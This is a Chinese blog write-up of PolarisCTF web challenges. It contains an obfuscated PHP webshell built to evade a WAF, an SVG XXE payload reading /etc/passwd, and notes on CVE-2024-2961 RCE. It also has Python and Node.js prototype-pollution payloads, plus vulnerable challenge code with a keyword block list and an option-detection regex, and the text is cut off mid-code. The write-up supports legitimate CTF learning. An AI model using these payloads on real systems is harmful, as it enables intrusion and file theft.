

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  <link rel="icon" href="https://gitee.com/bobrocket/img/raw/master/Snipaste_2025-12-30_21-02-15.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  <meta name="referrer" content="no-referrer">
  
    <meta name="description" content="当时做的时候大部分题都是用ai做的，没学到什么东西，但是题目质量还是很高的，看到平台上有复现环境了，决定不用agent自己做一遍 only real考点：jwt伪造 非预期直接看&#x2F;flag.php就行 revengejwt爆破密钥伪造admin之后就可以上传图片，后端对文件类型没有校验，直接抓包修改文件后缀名，文件内容有WAF，我们使用ascii🐎 12345678&lt;?&#x3D;$fun">
<meta property="og:type" content="article">
<meta property="og:title" content="PolarisCTF">
<meta property="og:url" content="https://www.sunynov.top/2026/04/28/PolarisCTF/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="当时做的时候大部分题都是用ai做的，没学到什么东西，但是题目质量还是很高的，看到平台上有复现环境了，决定不用agent自己做一遍 only real考点：jwt伪造 非预期直接看&#x2F;flag.php就行 revengejwt爆破密钥伪造admin之后就可以上传图片，后端对文件类型没有校验，直接抓包修改文件后缀名，文件内容有WAF，我们使用ascii🐎 12345678&lt;?&#x3D;$fun">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260506193205476.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260506193236557.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260331190511502.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507101113731.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507141846540.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507211720997.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507211904717.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507212449564.png">
<meta property="og:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260507213448091.png">
<meta property="article:published_time" content="2026-04-28T13:16:47.000Z">
<meta property="article:modified_time" content="2026-05-07T13:50:03.761Z">
<meta property="article:author" content="suny">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://gitee.com/bobrocket/img/raw/master/image-20260506193205476.png">
  
  
  
  <title>PolarisCTF - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.sunynov.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/background.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PolarisCTF"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-04-28 21:16" pubdate>
          2026年4月28日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          30 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">PolarisCTF</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年5月7日 晚上
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <p>当时做的时候大部分题都是用ai做的，没学到什么东西，但是题目质量还是很高的，看到平台上有复现环境了，决定不用agent自己做一遍</p>
<h2 id="only-real"><a href="#only-real" class="headerlink" title="only real"></a>only real</h2><p>考点：jwt伪造</p>
<h4 id="非预期"><a href="#非预期" class="headerlink" title="非预期"></a>非预期</h4><p>直接看&#x2F;flag.php就行</p>
<h4 id="revenge"><a href="#revenge" class="headerlink" title="revenge"></a>revenge</h4><p>jwt爆破密钥伪造admin之后就可以上传图片，后端对文件类型没有校验，直接抓包修改文件后缀名，文件内容有WAF，我们使用ascii🐎</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?=</span><br><span class="hljs-variable">$func</span>=<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">115</span>).<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">121</span>).<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">115</span>).<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">116</span>).<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">101</span>).<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-number">109</span>);<br><span class="hljs-variable">$cmd</span>=<span class="hljs-string">&#x27;&#x27;</span>;<br><span class="hljs-variable">$cmd_chars</span>=[<span class="hljs-number">99</span>, <span class="hljs-number">97</span>, <span class="hljs-number">116</span>, <span class="hljs-number">32</span>, <span class="hljs-number">47</span>, <span class="hljs-number">102</span>, <span class="hljs-number">108</span>, <span class="hljs-number">97</span>, <span class="hljs-number">103</span>];<br><span class="hljs-keyword">foreach</span>(<span class="hljs-variable">$cmd_chars</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$ascii</span>)&#123;<br>    <span class="hljs-variable">$cmd</span>.=<span class="hljs-title function_ invoke__">chr</span>(<span class="hljs-variable">$ascii</span>);<br>&#125;<br>@<span class="hljs-variable">$func</span>(<span class="hljs-variable">$cmd</span>);<br></code></pre></td></tr></table></figure>

<h2 id="头像上传器"><a href="#头像上传器" class="headerlink" title="头像上传器"></a>头像上传器</h2><p>考点：SVG XXE，CVE-2024-2961</p>
<p>一个上传头像的页面，白名单的后缀校验，并且文件重命名，不好绕过</p>
<p>头像的位置有渲染但不是文件包含，支持的格式有svg，尝试一下svg xxe</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-meta">&lt;!DOCTYPE <span class="hljs-keyword">svg</span> [</span><br><span class="hljs-meta">  <span class="hljs-meta">&lt;!ENTITY <span class="hljs-keyword">xxe</span> <span class="hljs-keyword">SYSTEM</span> <span class="hljs-string">&quot;file:///etc/passwd&quot;</span>&gt;</span></span><br><span class="hljs-meta">]&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">svg</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">&quot;http://www.w3.org/2000/svg&quot;</span>&gt;</span><br>  <span class="hljs-tag">&lt;<span class="hljs-name">text</span>&gt;</span><span class="hljs-symbol">&amp;xxe;</span><span class="hljs-tag">&lt;/<span class="hljs-name">text</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">svg</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>成功读到文件了，但是要实现RCE执行<code>/readflag</code>，这里需要打CVE-2024-2961</p>
<blockquote>
<p>事实上，CVE-2024-2961 的 sink 点不在于文件包含，而在于 php 伪协议。基本原理是利用 php 伪协议调用 iconv 函数，通过字符集 <code>ISO-2022-CN-EXT</code> 的特性将三字节字符解码为四字节，从而造成缓冲区的溢出。</p>
<p>如果能够配合可读取的文件，就能获取到 PHP 堆地址和 libc，然后得到 system 函数的地址打 rce</p>
</blockquote>
<p>这里还是老方法，读map，libc然后用脚本生成链子，但是svg上传之后解析会报错</p>
<blockquote>
<p><code>php://filter</code> 是作为外部实体的 SYSTEM 标识符传入 <code>DOMDocument::load()</code>，因此它首先要经过 libxml 的 URI 解析，而不是直接进入 PHP 用户态流处理。| 在这种 URI 语境下不属于稳定、规范的路径分隔字符，容易在外部实体解析阶段被拒绝、归一化或导致后续路径解释异常，从而使整条 filter chain 无法原样传递给底层 stream wrapper。因此需要改用 <code>/</code>，让 payload 同时满足 URI 语法和 php:&#x2F;&#x2F;filter 的路径式解析规则。</p>
</blockquote>
<p>好吧，我们改一下格式，并且不url编码</p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs groovy"><span class="hljs-regexp">/readflag &gt; /</span><span class="hljs-keyword">var</span><span class="hljs-regexp">/www/</span>html<span class="hljs-regexp">/uploads/</span><span class="hljs-number">1.</span>txt<br></code></pre></td></tr></table></figure>

<p>这个题最终未解决的点就是用kezibei师傅的脚本最终只能在uploads目录下写文件，并且没法直接访问，必须curl才能出结果</p>
<p>但是网上改的cnext脚本是可以实现任意写文件的</p>
<h2 id="ez-python"><a href="#ez-python" class="headerlink" title="ez_python"></a>ez_python</h2><p>考点：python原型链污染</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> flask <span class="hljs-keyword">import</span> Flask, request<br><span class="hljs-keyword">import</span> json<br><br>app = Flask(__name__)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">merge</span>(<span class="hljs-params">src, dst</span>):<br>    <span class="hljs-keyword">for</span> k, v <span class="hljs-keyword">in</span> src.items():<br>        <span class="hljs-keyword">if</span> <span class="hljs-built_in">hasattr</span>(dst, <span class="hljs-string">&#x27;__getitem__&#x27;</span>):<br>            <span class="hljs-keyword">if</span> dst.get(k) <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(v) == <span class="hljs-built_in">dict</span>:<br>                merge(v, dst.get(k))<br>            <span class="hljs-keyword">else</span>:<br>                dst[k] = v<br>        <span class="hljs-keyword">elif</span> <span class="hljs-built_in">hasattr</span>(dst, k) <span class="hljs-keyword">and</span> <span class="hljs-built_in">type</span>(v) == <span class="hljs-built_in">dict</span>:<br>            merge(v, <span class="hljs-built_in">getattr</span>(dst, k))<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">setattr</span>(dst, k, v)<br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Config</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-variable language_">self</span>.filename = <span class="hljs-string">&quot;app.py&quot;</span><br><br><span class="hljs-keyword">class</span> <span class="hljs-title class_">Polaris</span>:<br>    <span class="hljs-keyword">def</span> <span class="hljs-title function_">__init__</span>(<span class="hljs-params">self</span>):<br>        <span class="hljs-variable language_">self</span>.config = Config()<br><br>instance = Polaris()<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/&#x27;</span>, methods=[<span class="hljs-string">&#x27;GET&#x27;</span>, <span class="hljs-string">&#x27;POST&#x27;</span>]</span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">index</span>():<br>    <span class="hljs-keyword">if</span> request.data:<br>        merge(json.loads(request.data), instance)<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Welcome to Polaris CTF&quot;</span><br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/read&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">read</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(instance.config.filename).read()<br><br><span class="hljs-meta">@app.route(<span class="hljs-params"><span class="hljs-string">&#x27;/src&#x27;</span></span>)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">src</span>():<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">open</span>(__file__).read()<br><br><span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">&#x27;__main__&#x27;</span>:<br>    app.run(host=<span class="hljs-string">&#x27;0.0.0.0&#x27;</span>, port=<span class="hljs-number">5000</span>, debug=<span class="hljs-literal">False</span>)<br></code></pre></td></tr></table></figure>

<p>非常简单的一个python原型链污染，可以污染filename也可以污染全局变量</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;config&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;filename&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;/flag&quot;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;__init__&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;__globals__&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;__file__&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;/flag&quot;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<h2 id="Broken-Trust"><a href="#Broken-Trust" class="headerlink" title="Broken Trust"></a>Broken Trust</h2><p>考点：SQL注入</p>
<p>查看源代码，发现一个查询uid的api接口，测试一下sql注入，admin的uid就出来了</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260506193205476.png" srcset="/img/loading.gif" lazyload alt="image-20260506193205476"></p>
<p>admin可以备份文件，通过路径穿越读flag</p>
<p><img src="https://gitee.com/bobrocket/img/raw/master/image-20260506193236557.png" srcset="/img/loading.gif" lazyload alt="image-20260506193236557"></p>
<h2 id="ezpollute"><a href="#ezpollute" class="headerlink" title="ezpollute"></a>ezpollute</h2><p>考点：nodejs原型链污染，nodejs命令行选项</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">const</span> express = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;express&#x27;</span>);<br><span class="hljs-keyword">const</span> &#123; spawn &#125; = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>);<br><span class="hljs-keyword">const</span> path = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;path&#x27;</span>);<br><br><span class="hljs-keyword">const</span> app = <span class="hljs-title function_">express</span>();<br>app.<span class="hljs-title function_">use</span>(express.<span class="hljs-title function_">json</span>());<br>app.<span class="hljs-title function_">use</span>(express.<span class="hljs-title function_">static</span>(__dirname));<br><br><span class="hljs-keyword">function</span> <span class="hljs-title function_">merge</span>(<span class="hljs-params">target, source, res</span>) &#123;<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> key <span class="hljs-keyword">in</span> source) &#123;<br>        <span class="hljs-keyword">if</span> (key === <span class="hljs-string">&#x27;__proto__&#x27;</span>) &#123; <span class="hljs-comment">//试图防止原型链污染</span><br>            <span class="hljs-keyword">if</span> (res) &#123;<br>                res.<span class="hljs-title function_">send</span>(<span class="hljs-string">&#x27;get out!&#x27;</span>);<br>                <span class="hljs-keyword">return</span>;<br>            &#125;<br>            <span class="hljs-keyword">continue</span>;<br>        &#125; <br>        <br>        <span class="hljs-keyword">if</span> (source[key] <span class="hljs-keyword">instanceof</span> <span class="hljs-title class_">Object</span> &amp;&amp; key <span class="hljs-keyword">in</span> target) &#123;<br>            <span class="hljs-title function_">merge</span>(target[key], source[key], res);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            target[key] = source[key];<br>        &#125;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">let</span> config = &#123;<br>    <span class="hljs-attr">name</span>: <span class="hljs-string">&quot;CTF-Guest&quot;</span>,<br>    <span class="hljs-attr">theme</span>: <span class="hljs-string">&quot;default&quot;</span><br>&#125;;<br><br>app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/api/config&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123; <span class="hljs-comment">//配置修改接口</span><br>    <span class="hljs-keyword">let</span> userConfig = req.<span class="hljs-property">body</span>;<br><br>    <span class="hljs-keyword">const</span> forbidden = [<span class="hljs-string">&#x27;shell&#x27;</span>, <span class="hljs-string">&#x27;env&#x27;</span>, <span class="hljs-string">&#x27;exports&#x27;</span>, <span class="hljs-string">&#x27;main&#x27;</span>, <span class="hljs-string">&#x27;module&#x27;</span>, <span class="hljs-string">&#x27;request&#x27;</span>, <span class="hljs-string">&#x27;init&#x27;</span>, <span class="hljs-string">&#x27;handle&#x27;</span>,<span class="hljs-string">&#x27;environ&#x27;</span>,<span class="hljs-string">&#x27;argv0&#x27;</span>,<span class="hljs-string">&#x27;cmdline&#x27;</span>]; <span class="hljs-comment">//过滤关键字</span><br>    <span class="hljs-keyword">const</span> bodyStr = <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(userConfig).<span class="hljs-title function_">toLowerCase</span>();<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> word <span class="hljs-keyword">of</span> forbidden) &#123;<br>        <span class="hljs-keyword">if</span> (bodyStr.<span class="hljs-title function_">includes</span>(<span class="hljs-string">`&quot;<span class="hljs-subst">$&#123;word&#125;</span>&quot;`</span>)) &#123;<br>            <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">403</span>).<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">error</span>: <span class="hljs-string">`Forbidden keyword detected: <span class="hljs-subst">$&#123;word&#125;</span>`</span> &#125;);<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">try</span> &#123;<br>        <span class="hljs-title function_">merge</span>(config, userConfig, res); <br>        res.<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">status</span>: <span class="hljs-string">&quot;success&quot;</span>, <span class="hljs-attr">msg</span>: <span class="hljs-string">&quot;Configuration updated successfully.&quot;</span> &#125;);<br>    &#125; <span class="hljs-keyword">catch</span> (e) &#123;<br>        res.<span class="hljs-title function_">status</span>(<span class="hljs-number">500</span>).<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">status</span>: <span class="hljs-string">&quot;error&quot;</span>, <span class="hljs-attr">message</span>: <span class="hljs-string">&quot;Internal Server Error&quot;</span> &#125;);<br>    &#125;<br>&#125;);<br><br>app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/api/status&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">req, res</span>) =&gt;</span> &#123; <span class="hljs-comment">//系统状态接口</span><br><br>    <span class="hljs-keyword">const</span> customEnv = <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">create</span>(<span class="hljs-literal">null</span>);<br>    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> key <span class="hljs-keyword">in</span> process.<span class="hljs-property">env</span>) &#123;<span class="hljs-comment">//process 是 Node.js 的一个全局对象,而 env 是它上面的一个属性，包含了当前操作系统环境的所有变量</span><br>        <span class="hljs-keyword">if</span> (key === <span class="hljs-string">&#x27;NODE_OPTIONS&#x27;</span>) &#123;<br>            <span class="hljs-keyword">const</span> value = process.<span class="hljs-property">env</span>[key] || <span class="hljs-string">&quot;&quot;</span>;<br><br>            <span class="hljs-keyword">const</span> dangerousPattern = <span class="hljs-regexp">/(?:^|\s)--(require|import|loader|openssl|icu|inspect)\b/i</span>;<br><br>            <span class="hljs-keyword">if</span> (!dangerousPattern.<span class="hljs-title function_">test</span>(value)) &#123;<br>                customEnv[key] = value;<br>            &#125;<br>            <span class="hljs-keyword">continue</span>;<br>        &#125;<br>        customEnv[key] = process.<span class="hljs-property">env</span>[key];<br>    &#125;<br>    <br>    <span class="hljs-keyword">const</span> proc = <span class="hljs-title function_">spawn</span>(<span class="hljs-string">&#x27;node&#x27;</span>, [<span class="hljs-string">&#x27;-e&#x27;</span>, <span class="hljs-string">&#x27;console.log(&quot;System Check: Node.js is running.&quot;)&#x27;</span>], &#123; <span class="hljs-comment">//简单来说，spawn 的作用是在你的主程序之外，启动一个新的命令行进程来执行任务。</span><br>        <span class="hljs-attr">env</span>: customEnv,<br>        <span class="hljs-attr">shell</span>: <span class="hljs-literal">false</span>  <span class="hljs-comment">//不使用系统shell</span><br>    &#125;);<br>    <br>    <span class="hljs-keyword">let</span> output = <span class="hljs-string">&#x27;&#x27;</span>;<br>    proc.<span class="hljs-property">stdout</span>.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;data&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">data</span>) =&gt;</span> &#123; output += data; &#125;);<br>    proc.<span class="hljs-property">stderr</span>.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;data&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">data</span>) =&gt;</span> &#123; output += data; &#125;);<br>    <br>    proc.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;close&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">code</span>) =&gt;</span> &#123;<br>        res.<span class="hljs-title function_">json</span>(&#123; <br>            <span 